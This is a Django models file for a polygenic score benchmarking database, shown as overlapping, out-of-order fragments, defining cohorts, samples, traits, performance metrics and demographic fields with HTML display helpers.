[years, months,", "models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if", "len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property", "null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped", "Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of", "return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type,", "= models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def", "distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean')", "self.unit) return None def display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span>", ": {} {}' no_helptip = '{} : {} {}' # Estimate e =", "models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'),", "!= None and '[' not in estimate: l[self.range_type] = str(self.range) # Variability if", "({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals", "othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': 
othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return", "# if self.mapped_terms: # return self.mapped_terms.split(' | ') # else: # return []", "open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se')", "m.display_value())) if len(l) != 0: return l return None class BM_Metric(models.Model): \"\"\"Class to", "null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True)", "\"\"\" Generic method to extract and format the diverse metric data\"\"\" # Using", "'{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS", "PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500,", "\"\"\"Class to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100,", "'<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if", "'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id)", "MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification", "# category_labels = self.category_labels_list # categories_data = '' # if len(category_labels) > 0:", "def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent", "a performance metric\"\"\" 
performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES", "= models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad =", "@property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self):", "= str(self.estimate) if self.range != None and self.range_type.lower() == 'ci': estimate += str(self.range)", "'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES,", "v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\"", "of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex type", "days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') #", "</span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring", "!= None: l.append(r) if (len(l) == 1): return l[0] elif (len(l) > 1):", "if len(categories) > 0: # category_labels = [] # for category in categories:", "(type)', max_length=100, default='se') # e.g. 
standard deviation (sd), standard error (se) def format_estimate(self):", "= models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample',", "l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return None class BM_Metric(models.Model): \"\"\"Class", "## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French,", "to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">'", "not in estimate: l[self.range_type] = str(self.range) # Variability if self.variability != None: l[self.variability_type]", "> 0: # categories_data = ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self):", "'' if self.estimate != None: estimate = str(self.estimate) if self.range != None and", "import models from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields", "phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types", "#def category_labels_list(self): # categories = self.category_list # if len(categories) > 0: # return", "= helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v", "models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID)", "= models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. 
French, Chinese)', null=True) ancestry_country", "to related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample =", "null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation (sd), standard", "# e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range", "| %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return", "sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES =", "('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' )", "def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if", "for category in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0", "label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True)", "Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology", "sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ]", "and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability", "filter afterward uses less SQL queries than filtering directly on the queryset metrics", "estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100,", "'Standard 
Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class", "if len(e) > 0: l.append(e) # Variability v = None if self.variability !=", "if (len(l) == 1): return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else:", "def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list:", "Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s |", "null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self):", "('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40,", "# categories_data = ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories", "deviation (sd), standard error (se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type,", "format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if", "+= '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases)", "default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. 
[years,", "= set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self):", "* 100 return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk)", "if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data", "in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all():", "\"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores", "Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source", "len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def", "f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,}", "'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name =", "!= None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s", "id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500,", "= models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label) @property", "'ci': estimate += str(self.range) if estimate: 
l[self.estimate_type] = estimate # Range if self.range", "perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract", "not in e: if self.range != None: type_desc = self.range_type_desc() if (type_desc): r", "cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s |", "if estimate: l[self.estimate_type] = estimate # Range if self.range != None and '['", "phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self):", "= models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID", "self.estimate) if self.range != None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range))", "return data def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries']", "None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold", "__str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by =", "self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def", "e.g. 
standard deviation (sd), standard error (se) def format_estimate(self): if self.estimate != None:", "if self.range != None: type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(),", "= models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate',", "| ') # else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(),", "s = '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is None: return (self.name,", "that can be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type", "the effect', null=True) def __str__(self): if self.ci != None: s = '{} {}'.format(self.estimate,", "l['unit'] = self.unit return l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval',", "categories_data = '' # if len(categories) > 0: # category_labels = [] #", "training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases", "models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label) @property def", "= [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES,", "individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return", "self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else:", "Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') #", "Phenotype Description', 
null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True)", "if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate", "= models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100,", "'{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name,", "perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc", "interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range", "link multiple EFO to a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30,", "return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ')", "self.unit) if r != None: l.append(r) if (len(l) == 1): return l[0] elif", "max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of", "s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self):", "if r != None: l.append(r) if (len(l) == 1): return l[0] elif (len(l)", "# categories = self.category_list # if len(categories) > 0: # return [x.label for", "desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations", "= { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', }", "# 
categories_data = '' # if len(categories) > 0: # category_labels = []", "Links to related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample", "<i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring", "BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name',", "return '%s | %s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label)", "len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def", "max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait", "# return self.mapped_terms.split(' | ') # else: # return [] #@property #def category_list(self):", "class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and confidence intervals of", "Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return", "data = {} for type in data_types: data[type] = set() #for bm_performance in", "self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v)", "#@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def", "return None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return None", "Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance", 
"primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description',", "## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases',", "'</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number)", "= models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample", "queries than filtering directly on the queryset metrics = self.performance_metric.all() if metrics: l", "## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID =", "{}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v", "a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology", "and '[' not in estimate: l[self.range_type] = str(self.range) # Variability if self.variability !=", "Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric')", "1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l = {} # Estimate", "return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return", "performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for", "ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex:", "= [] for m in metrics: if (m.type == metric_type): 
l.append((m.name_tuple(), m.display_value())) if", "models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to", "of the effect', null=True) def __str__(self): if self.ci != None: s = '{}", "self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' |", "!= None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e += '", "no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) # Range r = None", "Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM',", "e.g. Confidence interval (ci), range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability", "== 'ci': estimate += str(self.range) if estimate: l[self.estimate_type] = estimate # Range if", "self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class", "othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to", "= models.IntegerField('Number of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES = [", "# else: # return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return", "= list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set()", "ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the effect',", "# Variability v = None if self.variability != None: type_desc = self.variability_type_desc() if", "l = {} # Estimate estimate = '' if self.estimate != None: estimate", "if self.range != None and '[' 
not in estimate: l[self.range_type] = str(self.range) #", "PubMed ID (PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample')", "desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd (cases)':", "> 0: # return [x.label for x in categories] # else: # return", "display_values_dict(self): l = {} # Estimate estimate = '' if self.estimate != None:", "estimate: l[self.range_type] = str(self.range) # Variability if self.variability != None: l[self.variability_type] = self.variability", "data def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data", "Estimate estimate = '' if self.estimate != None: estimate = str(self.estimate) if self.range", "for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {}", "'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to", "'<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number)", "self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for", "show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to", "less SQL queries than filtering directly on the queryset metrics = self.performance_metric.all() if", "!= None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring +=", "| ') # else: # return [] #@property #def mapped_terms_list(self): # if 
self.mapped_terms:", "'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower()", "validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True)", "None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def", "= '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s:", "# return [x.label for x in categories] # else: # return [] #@property", "Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate", "return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract and format the", "return categories_data #@property #def display_category_labels(self): # categories = self.category_list # categories_data = ''", "self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None def", "null=True, default='mean') #e.g. 
[mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g.", "SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6,", "for m in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) !=", "# else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y:", "class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self):", "'' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\"", "# Unit if self.unit != None: l['unit'] = self.unit return l def range_type_desc(self):", "= models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def", "if self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)'", "return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled trait", "| %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def", "= (self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return None def display_samples_for_table(self,", "#cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def", "variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard", "def variability_type_desc(self): 
desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se':", "\"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100,", "fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,}", "'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in", "range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile", "data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def", "return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts", "self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is None:", "(mainly to link multiple EFO to a single score)\"\"\" id = models.CharField('Ontology Trait", "!= None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l = [] helptip", "r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if (len(l) ==", "percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn", "effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if", "related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label) @property def display_label(self): return", 
"models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)',", "hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "categories_data #@property #def display_category_labels(self): # categories = self.category_list # categories_data = '' #", "in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'):", "None if self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc,", "not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'):", "samples used in variant associations and PGS training/testing\"\"\" # Sample Information ## Numbers", "format_range(self): if self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return", "return self.mapped_terms.split(' | ') # else: # return [] #@property #def category_list(self): #", "# categories = self.category_list # categories_data = '' # if len(categories) > 0:", "[ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both',", "data\"\"\" # Using all and filter afterward uses less SQL queries than filtering", "#scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def", "None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else:", 
"and self.range_type.lower() == 'ci': estimate += str(self.range) if estimate: l[self.estimate_type] = estimate #", "related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property", "__str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled", "return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return", "interval (ci), range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True)", "in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant", "!= None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate == None", "hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return", "median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days] range", "= self.category_list # categories_data = '' # if len(categories) > 0: # category_labels", "\"\"\"Class to describe Sample fields (sample_age, followup_time) that can be point estimates or", "+= '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring", "# category_labels = [] # for category in categories: # v_spacing = '", "max_length=100, null=True, default='mean') #e.g. 
